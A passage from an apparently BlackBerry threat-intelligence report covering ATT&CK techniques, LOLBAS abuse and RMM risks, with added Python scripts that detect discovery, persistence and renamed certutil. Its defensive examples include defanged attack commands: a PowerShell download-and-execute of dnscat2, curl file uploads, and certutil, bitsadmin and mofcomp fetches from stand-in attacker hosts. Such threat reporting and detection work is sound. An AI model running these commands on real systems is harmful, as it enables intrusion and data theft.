This is a sophisticated cyberthreat tactic employed by attackers to disguise their activities and evade detection. For instance, by using a false name, icon and metadata, harmful actions can be easily disguised as standard system operations. Masquerading as a legitimate file or process can trick users and security software into opening or saving a fake file, which can lead to system penetration and data loss. (Find details on identifying a masquerading method in our CylanceMDR Observations section of this report.)
Here is a breakdown of common masquerading methods:
- Renaming Executables: Attackers often rename malicious executables to pretend they are a legitimate system program (e.g., svchost.exe, explorer.exe) and may change or add another fake extension to hide the real file type, such as .txt.doc or .exe.config. The goal is to trick users and security tools when running manual or automatic system checks, so the user will run or try to open the malicious file without heeding any system warnings.
- Mimicking File Paths: Commonly trusted directories (e.g., System32) receive less scrutiny from security tools. For that reason, attackers often place malicious files in these directories and give them legitimate process names to conceal them.
- Invalid Code Signature: Attackers may sign their malware with invalid or stolen digital certificates to bypass security measures. This misleads systems and users into trusting malicious files or processes by making them appear as if they are verified by a legitimate source. Attackers may use expired, revoked or fraudulently obtained certificates. Identifying such tactics requires robust certificate validation processes and alert systems that can flag unusual certificate data or failed validations. For example, to masquerade cmd.exe as a calculator app:
Copy c:\windows\system32\cmd.exe C:\calc.exe
File and Directory Discovery – T1083
File and Directory Discovery is frequently utilized during an attacker’s reconnaissance stage to gain insight into the target environment, identify potential files for exfiltration or manipulation, locate sensitive information or support further stages of an attack chain.
The following are command lines used for this technique:
- ‘dir /s C:\path\to\directory’ – Uses the dir utility to recursively list files and directories in the given directory and its subdirectories.
- ‘tree /F’ – Uses the tree utility to display the directory tree along with the file names in each directory.
- ‘powershell.exe -c "Get-ChildItem C:\path\to\directory"’ – Runs the Get-ChildItem cmdlet in PowerShell, which retrieves a list of files and directories in the specified path.
Threat actors may also use native Windows API functions to enumerate files and directories. The following are Windows API functions used by threat actors:
- FindFirstFile – Retrieves information about the first file or directory that matches the specified file name or directory name pattern.
- FindNextFile – Continues a file search initiated by a previous call to the FindFirstFile function.
- PathFileExists – Verifies whether a specified directory or file exists.
Application Layer Protocol – T1071
Threat actors are constantly seeking new ways to conceal their actions within legitimate traffic to avoid detection. Application layer protocol manipulation (T1071) is a popular technique. During the first three months of 2024, this technique emerged as one of the top five tactics employed by malicious actors. By exploiting vulnerabilities in commonly used network protocols such as HTTP, HTTPS, DNS or SMB, adversaries can blend malicious activity seamlessly into routine network traffic.
This technique can be used to exfiltrate data, enable C2 communication, and move laterally within compromised networks. For instance, adversaries may encode sensitive data within HTTP headers or leverage DNS tunneling to bypass network defenses and extract information without raising suspicion. The stealthy nature of application layer protocol manipulation poses significant challenges to detection and attribution, as many traditional security tools struggle to differentiate between normal and malicious network activity.
Given the prevalence and sophistication of this technique, organizations must adopt proactive measures to bolster their defenses. A robust network monitoring solution must be capable of detecting anomalous traffic patterns and ensuring that suspicious behavior associated with application layer protocol manipulation is accurately differentiated from routine user activity.
Furthermore, maintaining up-to-date security patches for network protocols and applications can mitigate known vulnerabilities and exploits. By implementing endpoint detection and response (EDR) solutions, organizations can enhance their ability to identify and respond to malicious activities perpetrated through application layer protocol manipulation, thereby bolstering their overall cybersecurity posture.
The following are application layer protocol commands used by threat actors:
curl -F "file=@C:\Users\tester\Desktop\test[.]txt" 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]githubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1')
Registry Run Keys / Startup Folder – T1547.001
Registry Run Keys / Startup Folder manipulation is a technique used by adversaries to establish persistence on compromised systems. This technique featured prominently among the top tactics utilized by cyberthreat actors in this reporting period. By tampering with Windows Registry keys or adding malicious entries to startup folders, adversaries ensure that their malicious payloads execute automatically upon system boot-up or user login, facilitating ongoing control over compromised systems.
This technique enables adversaries to deploy a wide range of malware, including backdoors, keyloggers and ransomware, thereby maintaining persistent access to compromised systems. Adversaries exploit native functionalities of Windows to evade detection. The abuse of legitimate system configurations makes detection and mitigation of these threats more challenging for traditional AV solutions.
To counter the threat posed by manipulation of registry run keys and startup folders, organizations must adopt a multi-layered approach to endpoint security:
- Regularly monitor and audit Windows Registry keys and startup folders to detect unauthorized changes indicative of malicious activity.
- Implement application whitelisting to help prevent unauthorized executables.
- Set privilege management controls to restrict adversaries’ ability to manipulate critical system configurations.
- Conduct user education and awareness programs to empower employees to recognize and report suspicious startup items or registry modifications.
- Enhance overall threat detection and response capabilities.
Some commands to be vigilant about include:
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\file[.]txt"
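The Security Software Discovery, File and Directory Discovery and Registry Run Keys / Startup Folder command lines listed in this section are the kind of telemetry a SOC rule should match on. The following is an added example, not BlackBerry code: it matches those command lines in constructed process-creation events and rates each host by whether discovery was followed by a persistence write (the field names and sample hosts are assumptions).

```python
"""Added example: flag the discovery (T1518.001, T1083) and run-key/startup-folder
(T1547.001) command lines quoted in this report in process-creation telemetry,
then rate each host by the combination of techniques seen. Not BlackBerry code."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str       # MITRE ATT&CK technique ID
    description: str
    pattern: re.Pattern  # case-insensitive match against the full command line


# One rule per command line the report lists; ".exe" suffixes and switch spacing are tolerated.
RULES = [
    Rule("T1518.001", "netsh firewall/interface enumeration",
         re.compile(r'\bnetsh(\.exe)?\s+(firewall\s+show|interface\s+dump)', re.I)),
    Rule("T1518.001", "findstr search for 'defender'",
         re.compile(r'\bfindstr(\.exe)?\b.*\bdefender\b', re.I)),
    Rule("T1518.001", "verbose tasklist", re.compile(r'\btasklist(\.exe)?\s+/v\b', re.I)),
    Rule("T1518.001", "Empire Get-AntiVirusProduct", re.compile(r'get-antivirusproduct', re.I)),
    Rule("T1518.001", "WMIC SecurityCenter2 AntiVirusProduct query",
         re.compile(r'\bwmic(\.exe)?\b.*securitycenter2.*antivirusproduct', re.I)),
    Rule("T1083", "recursive dir listing", re.compile(r'\bdir\s+(/\w+\s+)*/s\b', re.I)),
    Rule("T1083", "tree /F listing", re.compile(r'\btree(\.com)?\s+/f\b', re.I)),
    Rule("T1083", "Get-ChildItem via powershell -c",
         re.compile(r'\bpowershell(\.exe)?\b.*get-childitem', re.I)),
    Rule("T1547.001", "reg add to Run/RunOnce/Shell Folders",
         re.compile(r'\breg(\.exe)?\s+add\s+"?hk(ey_current_user|cu|ey_local_machine|lm)\\software'
                    r'\\microsoft\\windows\\currentversion\\(run|runonce|explorer\\shell folders)', re.I)),
    Rule("T1547.001", "file written into the Startup folder",
         re.compile(r'\\start menu\\programs\\startup\\', re.I)),
]

DISCOVERY = {"T1518.001", "T1083"}
PERSISTENCE = "T1547.001"


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    command_line: str


def match_rules(command_line):
    """Return (technique, description) for every rule the command line triggers."""
    return [(r.technique, r.description) for r in RULES if r.pattern.search(command_line)]


def analyse(events):
    """Map host -> (sorted technique IDs, verdict). Hosts with no hits are omitted.

    Discovery alone is noisy (administrators run these commands too); discovery plus a
    persistence write on the same host is the combination worth escalating.
    """
    per_host = defaultdict(set)
    for ev in events:
        for technique, _ in match_rules(ev.command_line):
            per_host[ev.host].add(technique)
    findings = {}
    for host, techniques in per_host.items():
        persisted = PERSISTENCE in techniques
        if techniques & DISCOVERY and persisted:
            verdict = "HIGH: security-software/file discovery followed by persistence"
        elif persisted:
            verdict = "MEDIUM: persistence mechanism written"
        else:
            verdict = "LOW: discovery only, review in context"
        findings[host] = (sorted(techniques), verdict)
    return findings


# Constructed sample telemetry (not real data); command lines mirror those in the report.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "alice", "netsh firewall show"),
    ProcessEvent("WS01", "alice", "cmd.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 "
                                  "Path AntiVirusProduct Get displayName /Format:List"),
    ProcessEvent("WS01", "alice", 'REG ADD "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion'
                                  '\\Explorer\\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"'),
    ProcessEvent("WS02", "bob", "tree /F"),
    ProcessEvent("WS02", "bob", 'powershell.exe -c "Get-ChildItem C:\\Users\\bob\\Documents"'),
    ProcessEvent("WS03", "svc", 'echo "" > "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\file.txt"'),
    ProcessEvent("WS04", "carol", "notepad.exe C:\\notes.txt"),
]

if __name__ == "__main__":
    for host, (techniques, verdict) in sorted(analyse(SAMPLE_EVENTS).items()):
        print(f"{host}: {', '.join(techniques)} -> {verdict}")
```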
CylanceMDR Data
This section of the report highlights several of the most common threat detections observed in CylanceMDR customer environments.
CylanceMDR, formerly known as CylanceGUARD®, is a subscription-based managed detection and response (MDR) service by BlackBerry that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats exploiting gaps in the customer’s security programs. The CylanceMDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry by region to provide additional insight into the current threat landscape.
CylanceMDR Observations
This reporting period, the CylanceMDR team observed that Certutil drove a lot of detection activity within the security operations center (SOC), namely, the technique related to renaming tools such as Certutil (e.g.: ‘Possible Certutil Renamed Execution’). There was a spike of detections related to this across all geographical regions where BlackBerry protects customers.
In our previous report, we discussed how living-off-the-land binaries and scripts (LOLBAS) utilities such as Certutil are abused or misused by threat actors: they often rename legitimate utilities (such as Certutil) in an attempt to evade detection capabilities. This is known as masquerading and has the MITRE Technique ID: T1036.003. Defenders must deploy robust detection capabilities to minimize the risk of evasion techniques such as masquerading. For example, creating a detection rule that only triggers when it sees the command Certutil (along with any options/arguments seen abused with this tool) can easily be evaded.
Take the two commands below, for example:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
If your detection capabilities only rely on seeing the command certutil (along with its options), this will be detected, but considered a weak protection as it could easily be evaded.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
In this case, we have renamed certutil.exe to outlook.exe and this would completely evade the detection (if using the logic discussed above).
A better solution would be to ensure that portable executable (PE) file/process metadata such as the original file name (the internal file name provided at compile time) is collected and integrated into the detection capabilities. A mismatch between the file name on disk and the binary’s PE metadata is a good indicator that a binary was renamed after compile time.
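The two certutil/outlook.exe commands above can be checked by both kinds of rule side by side. This is an added example, not CylanceMDR code: a name-only rule beside one keyed on the PE OriginalFilename, run over constructed process events (the field names follow what Sysmon event ID 1 records; the paths, sample events and benign-mismatch list are assumptions).

```python
"""Added example: name-only vs. PE-metadata-aware detection of a renamed certutil,
as in the outlook.exe case above. Not BlackBerry/CylanceMDR code; field names
mirror what Sysmon event ID 1 and most EDR agents record for a process start."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# certutil's cached-URL download switch, in either -switch or /switch form.
CERTUTIL_DOWNLOAD = re.compile(r'[-/]urlcache\b.*[-/]f\b', re.I)

# Known benign on-disk / OriginalFilename mismatches (constructed; build from your own baseline).
BENIGN_MISMATCHES = {("python3.exe", "python.exe")}


@dataclass(frozen=True)
class ProcessEvent:
    image_path: str          # executable path on disk
    original_file_name: str  # OriginalFilename from the PE version resource ("" if absent)
    command_line: str


def disk_name(ev):
    return PureWindowsPath(ev.image_path).name.lower()


def weak_detect(ev):
    """The rule the report calls weak: fires only when the file on disk is named certutil.exe."""
    return disk_name(ev) == "certutil.exe" and bool(CERTUTIL_DOWNLOAD.search(ev.command_line))


def robust_detect(ev):
    """Key on the compile-time OriginalFilename instead, and flag the rename itself (T1036.003).

    Returns a list of finding strings; an empty list means nothing suspicious.
    """
    on_disk = disk_name(ev)
    original = ev.original_file_name.lower()
    findings = []
    if original and on_disk != original and (on_disk, original) not in BENIGN_MISMATCHES:
        findings.append(f"renamed binary: on disk '{on_disk}', PE OriginalFilename '{original}' (T1036.003)")
    if original == "certutil.exe" and CERTUTIL_DOWNLOAD.search(ev.command_line):
        findings.append("certutil -urlcache download, regardless of on-disk name")
    return findings


# Constructed sample events (not real telemetry); URLs are defanged as in the report.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 'certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt'),
    ProcessEvent(r"C:\Users\Public\outlook.exe", "CertUtil.exe",
                 'outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE",
                 "OUTLOOK.EXE"),
    ProcessEvent(r"C:\Tools\unknown.exe", "", "unknown.exe --help"),  # no version resource at all
]


def triage(events):
    """Compare both rules over a batch: list of (on-disk name, weak verdict, robust findings)."""
    return [(disk_name(ev), weak_detect(ev), robust_detect(ev)) for ev in events]


if __name__ == "__main__":
    for name, weak, robust in triage(SAMPLE_EVENTS):
        print(f"{name:14} weak={weak!s:5} robust={robust or 'clean'}")
```

The second event is the renamed case from the text: the name-only rule stays silent while the metadata rule reports both the rename and the download.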
LOLBAS Activity
During this reporting period, we noted a change in the LOLBAS activity seen within our customer environments:
- Increase in detections related to regsvr32.exe.
- Decrease in mshta.exe-related activity.
- A sharp increase in detections related to bitsadmin.exe.
Below are examples of malicious LOLBAS usage (excluding those shared during the last reporting period).
File: Bitsadmin.exe
Mitre: T1197 | T1105
How it can be abused:
- Download/upload from or to malicious host (Ingress tool transfer)
- Can be used to execute malicious process
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
File: mofcomp.exe
Mitre: T1218
How it can be abused:
- Can be used to install malicious managed object format (MOF) scripts
- MOF statements are parsed by mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository
Example Command:
mofcomp.exe \\<AttackerIP>\content\BBwmi[.]mof
Remote monitoring and management (RMM) tools are frequently used by managed IT service providers (MSPs) to remotely monitor clients’ endpoints. Unfortunately, RMM tools also allow threat actors to access those same systems. These tools provide a slew of administration features and provide a way for the threat actor to blend in by using trusted and approved tools.
In 2023, RMM tool abuse was a focal point due to reports related to Scattered Spider, a cyberattack group thought to be behind the MGM Resorts International attacks in September 2023. Members of Scattered Spider are considered sophisticated social engineering experts and deploy various techniques such as SIM swap attacks, phishing and push bombing. They have used a range of RMM tools during their attacks such as:
- Splashtop
- TeamViewer
- ScreenConnect
As of the first reporting period in 2024, the attention on RMM tooling has remained high since the discovery of two vulnerabilities in ConnectWise ScreenConnect (all versions below 23.9.8). CVE details can be seen below:
CVE-2024-1709
CWE-288: Authentication bypass using an alternate path or channel.
CVE-2024-1708
CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”).
The graph below illustrates the most common RMM tools observed during this reporting period.
During our analysis, we noted that many customers use multiple RMM tools, increasing the organization’s attack surface and risk. Suggested mitigations include:
Audit Remote Access Tools (RMM Tools)
- Identify currently used RMM tools within the environment.
- Confirm they are approved within the environment.
- If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.
Disable Ports and Protocols
- Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.
Routinely Audit Logs
- Detect abnormal use of remote access tools.
Patching
- Ensure regular review of vulnerabilities associated with RMM tools used, updating as necessary.
- Internet accessible software such as RMM tools should always be a high priority when doing regular patch cycles.
Network Segmentation
- Minimize lateral movement by segmenting the network, limiting access to devices and data.
Device Tagging
- Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure the SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.
Memory-Loading RMM
- Use security software that can detect remote access tools that are loaded only in memory.
Conclusion
This 90-day report is designed to help you stay knowledgeable and prepared for future threats. When dealing with a rapidly shifting cybersecurity threat landscape, it’s helpful to stay current with the latest security news for your industry, geographic region and key issues. Here are our main takeaways for January through March 2024:
- Globally, BlackBerry stopped 37,000 attacks per day directed at our tenants, according to our internal Attacks Stopped telemetry. We noted a large increase in unique malware targeting our tenants and customers, up 40 percent per minute over the previous reporting period. This could suggest that threat actors are taking extensive measures to carefully target their victims.
- Infostealers were prominent in our Critical Infrastructure, Commercial Enterprise, and Top Threats sections. This suggests that sensitive and private data are highly sought by threat actors across all geographic regions and industries.
- As highlighted in our new Ransomware Section that describes the most notable ransomware groups, ransomware is increasingly targeting critical infrastructure, particularly healthcare.
- CVE exploitation has rapidly expanded in the last year and will continue. BlackBerry recorded nearly 9,000 new CVEs disclosed by NIST in the last three months. Additionally, over 56 percent of these disclosed vulnerabilities scored over 7.0 in criticality. Exploits related to heavily utilized legitimate software such as ConnectWise ScreenConnect, GoAnywhere and multiple genuine Ivanti products have been weaponized by threat actors at an alarming rate to deliver a whole host of malware to unpatched victim machines.
- Political deceptions through deepfakes and misinformation are increasingly spreading via social media and will continue to be a problem in the future, particularly related to the Russian invasion of Ukraine, the unfolding Middle East conflict, and the upcoming U.S. presidential election taking place in November.
More information on the top cybersecurity threats and defenses can be found in the BlackBerry blog.
Acknowledgements
This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:
Appendix: Critical Infrastructure and Commercial Enterprise Threats
8Base ransomware: A particularly aggressive ransomware group first seen in 2023. It has been extremely active in its short history, often targeting victims in North America and LATAM countries. The threat group leverages a mix of tactics to achieve initial access, then may also exploit vulnerabilities in the victim’s systems to maximize their potential payout.
Amadey (Amadey Bot): Multifunctional botnet that has a modular design. Once it lands on a victim’s device, Amadey can receive commands from its C2 servers to execute various tasks, namely stealing information and deploying additional payloads.
Buhti: A relatively new ransomware operation, Buhti utilizes variants of the leaked LockBit 3.0 (a.k.a. LockBit Black) and Babuk ransomware families to attack Windows and Linux systems. In addition, Buhti has been known to use a custom data exfiltration utility written in the “Go” programming language designed to steal files with specific extensions. The ransomware operators have also already been seen swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and the recently patched PaperCut vulnerability (CVE-2023-27350).
LummaStealer (LummaC2): C-based infostealer that targets commercial enterprise and critical infrastructure organizations, focusing on exfiltrating private and sensitive data from the victim device. Often promoted and distributed via underground forums and Telegram groups, this infostealer often relies on Trojans and spam to propagate.
PrivateLoader: A notorious downloader family that has been in the wild since 2021, targeting primarily commercial enterprises in North America. PrivateLoader (as its name implies) is an initial access mechanism, facilitating the deployment of a plethora of malicious payloads onto victim devices, namely infostealers. PrivateLoader operates a distribution network via an underground pay-per-install (PPI) service to finance its continued usage and development.
RaccoonStealer: MaaS infostealer. In the wild since 2019, the makers of RaccoonStealer have enhanced its abilities to avoid security software and traditional AV software. According to BlackBerry’s internal telemetry, RaccoonStealer has been observed targeting commercial enterprises in North America.
RedLine (RedLine Stealer): A widely distributed malware infostealer often sold via MaaS. The main motive of the threat group that distributes the malware appears to be mainly financial gain rather than politics, destruction or espionage. This is why RedLine has actively targeted a range of industries and geographic regions.
Remcos (RemcosRAT): A commercial-grade RAT used to remotely control a computer or device. Though advertised as legitimate software, the remote control and surveillance software was often used as a remote access Trojan.
SmokeLoader: A commonly utilized malware with a plethora of capabilities, namely the deployment of other malware onto a victim’s device. SmokeLoader has been a recurring threat observed by BlackBerry through multiple Global Threat Intelligence Reports. This reporting period, the malware was seen targeting commercial and professional services within North America.
Vidar (VidarStealer): A commodity infostealer that has been in the wild since 2018 and has developed into a heavily weaponized malware family. Attackers have been able to deploy Vidar by exploiting vulnerabilities in the popular ScreenConnect RMM software by ConnectWise. These two CVEs, CVE-2024-1708 and CVE-2024-1709, enabled threat actors to bypass authentication and access critical systems.